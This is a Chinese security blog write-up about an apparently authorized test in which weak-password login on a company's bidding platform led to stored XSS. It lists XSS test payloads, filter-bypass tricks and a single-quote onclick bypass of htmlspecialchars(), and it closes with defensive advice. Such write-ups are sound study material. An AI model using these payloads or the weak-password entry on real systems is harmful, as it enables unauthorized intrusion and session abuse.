对某公司一次弱口令到存储型xss挖掘
转自我的奇安信攻防社区文章:https://forum.butian.net/share/885
免责声明:
渗透过程为授权测试,所有漏洞均以提交相关平台,博客目的只为分享挖掘思路和知识传播**
涉及知识:
xss注入及xss注入绕过
挖掘过程:
某次针对某目标信息搜集无意发现某工程公司的项目招标平台
厚码…求生欲满满呜呜呜
随手一试就是弱口令登陆, 弱口令yyds!!!
发现在供应商资料中存在不少输入点,手痒随手一波xss
分享一波常用测试语句:
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x οnerrοr=alert("XSS");>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
刷一波发现大部分都有过滤,但是[股份/责任人] 栏下有代码被注入成功
语句为:"<script>alert('XSS')</script>"<
查看该部分DOM源码:
有戏!
针对该点继续测试,构造语句:
"<script>alert('XSS')</script>"<
“"<
“"<
url编码:
"<script>alert("''XSS'")%3C/script%3E
小总结:
发现 / 被转义成 =”” //
/变成 =””
</ script>转义成<="" script=""> 而且多个/
,如///也只被转义成 ="" 没办法重写绕过
并且存在htmlspecialchars()函数: "
,意味: """
本地测试发现script便签中存在 " 就无法弹窗
所以存在两个问题,一方面要绕过这个"
,而且要绕过</script>
的转义
- L先说对
</script>
的绕过思路:
转换法:
- 前端限制绕过,直接抓包重放,或者修改html前端代码
- 大小写,比如:
<scrIPT>alERT(1111)</scRIPT>
用来绕过 - 拼凑:
<scri<script>pt>alert(1111)</scri</script>pt>
- 使用注释干扰:
<scri<!--test-->pt>alert(111)</scri<!--test-->pt>
编码法:
核心思路:后台过滤了特殊字符,比如<script>
标签,但该标签可以被各种编码,后台不一定过滤,当浏览器对该编码进行识别时,会翻译成正常的便签,从而执行
在使用编码时需要主要编码在输出点是否会被正常是不和翻译!
- 接下来说对
"
的绕过:
htmlspecialchars()函数是把预定义的字符转换为HTML实体,预定义的字符是:&(和号)成为 &
" (双引号)成为"
‘(单引号)成为'
<(小于号)成为<
>(大于号) 成为>
可引用类型:
ENT_COMPAT-默认,仅编码双引号
ENT_QUOMES-编码双引号和单引号
ENT_NOQUOTES-不编码任何引号
eg:q'οnclick='alert(1111)'
其他函数
构造语句:
构造对"的绕过:
q'οnclick='alert(1111)'
直接产生弹窗:
重新访问页面该xss弹窗还在,说明注入成功
xss常见的防范措施
总的原则:输入做过滤,输出做转义
过滤:根据业务需求进行过滤,比如过滤要求输入手机号,则只允许输入手机号格式的数字
转义:所有输入到前端的数据都根据输出点进行转义,比如输出到HTML中进行HTML实体转义,输入到JS里面的进行JS转义
看完点赞关注不迷路!!! 后续继续更新优质安全内容!!!
对某公司一次弱口令到存储型xss挖掘相关推荐
- 常见的弱口令爆破工具
弱口令总结和爆破工具 弱口令定义 网站管理.运营人员由于安全意识不足,为了方便.避免忘记密码等,使用了非常容易记住的密码,或者是直接采用了系统的默认密码等. 攻击者利用此漏洞可直接进入应用系统或者管理 ...
- 弱口令(Weak Password)总结和爆破工具
文章目录 弱口令定义 弱口令字典 通过社工定制字典库 弱口令字典 爆破工具 超级弱口令检查工具 水影-域信息收集 WebCrack BurpSuite的intruder模块 hydra 弱口令定义 网 ...
- 弱口令总结和爆破工具
弱口令总结和爆破工具 弱口令定义 网站管理.运营人员由于安全意识不足,为了方便.避免忘记密码等,使用了非常容易记住的密码,或者是直接采用了系统的默认密码等. 攻击者利用此漏洞可直接进入应用系统或者管理 ...
- 【web安全】Web应用隔离防护之Web弱口令爆破
背景 近些年来,国内政府和企业网站被篡改的类似黑客攻击入侵事件频出,造成的社会影响及经济损失巨大,越来越多的企事业单位高度重视Web应用安全. 其中,黑客针对Web应用资产发起的弱口令攻击尤为常见. ...
- 安全测试(三) 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等 浅谈《社会工程学》实战案例
文章目录 一.前言 二.服务器安全 高危端口 2.1 端口号(Port number) 2.2 常见端口后及其用途表 2.3 端口号 扫描工具介绍 2.4 端口号 端口说明 攻击技巧 2.5 安全警示 ...
- 弱口令审计-工具用法大全
目前,帐号仍然是最主要的用户身份认证方式,但由于安全意识的淡漠,很多人仍在使用弱口令.而一旦泄漏,所有安全防范机制都将形同虚设. 本课程<用户口令审计>是『Kali Linux工具大全』技 ...
- 黑客术语肉鸡、后门、弱口令、shell、webshell、注入、端口、免杀、加壳、漏洞等
黑客术语 1.肉鸡: 所谓"肉鸡"是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以 ...
- 弱口令到底是什么牛马?
0x01 引言 很多系统管理员会选择容易记住的口令或在系统测试时用的弱口令没有删除,并且在一些系统,在注册时,会提示一些规则,比如密码的长度.必须是大小写字母数字组合等,这就给爆破系统提供了机会.一旦 ...
- 看我如何在赛门铁克邮件安全网关上实现弱口令到RCE漏洞执行
看我如何在赛门铁克邮件安全网关上实现弱口令到RCE漏洞执行 clouds 2017-06-19 共492809人围观 ,发现 6 个不明物体 网络安全 在这篇文章中,我将向大家分享我们团队最近在对某企 ...
最新文章
- 最大公共子序列、子串、可重叠重复子串
- c语言寻找James,[semi-tutorial]某亚里亚写在JamesM边上的OS笔记
- 编码调试:UnicodeDecodeError: ‘gbk‘ codec can‘t decode byte 0xaf in position 12: illegal multibyte sequen
- classloader
- ctypes python_Python使用Ctypes与C/C++
- Bootstrap 学习笔记8 下拉菜单滚动监听
- [剑指offer][JAVA]面试题第[03]题[数组中的重复数字][HashSet]
- Starter Kit for ASP.NET 2.0 家族又添新丁!
- Zookeeper配置参数与节点值的解读
- const char * char * const
- 在U盘上安装ChromiumOS
- 基于LSTM网络的藏头诗和古诗自动生成(附完整代码和数据)
- udl 连mysql_几种常见的数据库连接方法
- MySQL高级索引及调优篇
- JavaWeb静态网页
- 解决vue项目路由出现message: “Navigating to current location (XXX) is not allowed“的问题(点击多次跳转)
- 关于 trello 和 slack 的感想及使用经验
- MySQL 8.0 全文检索功能 根据中文字符检索相关数据
- 美式英语音标词对照表
- 关于google搜索
热门文章
- 主机ssh升级到6.7以上版本后,使用jsch jar包ssh连接不上报Algorithm negotiation fail问题的解决办法
- SpringBoot 整合 Shiro thymeleaf _01_Shiro概念
- 运放电路的工作原理_图文讲解!教你看懂7款经典运放电路
- 战神笔记本电脑自带access吗_笔记本电脑卡顿不要急着换,这几个方法,让你的电脑流畅爆表...
- 计算机知识产权 教学目标,计算机教学设计模板
- Python 匿名函数 lambda - Python零基础入门教程
- jq之省市区级联插件
- linux服务器安装php7_CentOS 7 下 PHP 7.1.12 安装配置
- 服务器的可维护性,可靠性和可维护性
- 【c语言数据结构】二叉树